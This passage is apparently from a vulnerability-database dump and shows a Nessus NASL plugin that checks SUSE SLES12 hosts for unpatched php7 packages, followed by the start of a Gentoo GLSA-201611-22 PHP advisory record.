script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7129/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7130/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7131/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7132/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7133/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7413/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7414/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7416/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7417/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7418/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162460-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71cad87f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2016-1434=1\n\nSUSE Linux Enterprise Module for Web Scripting 12:zypper in -t patch\nSUSE-SLE-Module-Web-Scripting-12-2016-1434=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php7-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php7-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bcmath-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bcmath-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bz2-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bz2-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-calendar-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-calendar-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ctype-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ctype-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-curl-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-curl-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dba-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dba-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-debugsource-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dom-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dom-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-enchant-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-enchant-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-exif-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-exif-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fastcgi-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fastcgi-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fileinfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fileinfo-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fpm-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fpm-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ftp-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ftp-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gd-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gd-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gettext-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gettext-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gmp-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gmp-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-iconv-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-iconv-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-imap-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-imap-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-intl-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-intl-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-json-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-json-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ldap-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ldap-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mbstring-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mbstring-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mcrypt-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mcrypt-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mysql-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mysql-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-odbc-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-odbc-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-opcache-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-opcache-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-openssl-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-openssl-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pcntl-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pcntl-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pdo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pdo-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pgsql-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pgsql-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-phar-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-phar-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-posix-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-posix-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pspell-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pspell-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-shmop-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-shmop-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-snmp-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-snmp-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-soap-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-soap-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sockets-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sockets-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sqlite-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sqlite-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvmsg-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvmsg-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvsem-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvsem-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvshm-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvshm-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-tokenizer-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-tokenizer-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-wddx-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-wddx-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlreader-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlreader-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlrpc-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlrpc-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlwriter-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlwriter-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xsl-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xsl-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zip-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zip-debuginfo-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zlib-7.0.7-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zlib-debuginfo-7.0.7-15.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php7\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:58", "description": "The remote host is affected by the vulnerability described in GLSA-201611-22 (PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details.\n Impact :\n\n An attacker can possibly execute arbitrary code or create a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "GLSA-201611-22 : PHP: Multiple vulnerabilities (httpoxy)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8865", "CVE-2016-3074", "CVE-2016-4071", "CVE-2016-4072", "CVE-2016-4073", "CVE-2016-4537", "CVE-2016-4538", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-4544", "CVE-2016-5385", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7126", "CVE-2016-7127", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132", "CVE-2016-7133", "CVE-2016-7134", "CVE-2016-7411", "CVE-2016-7412", 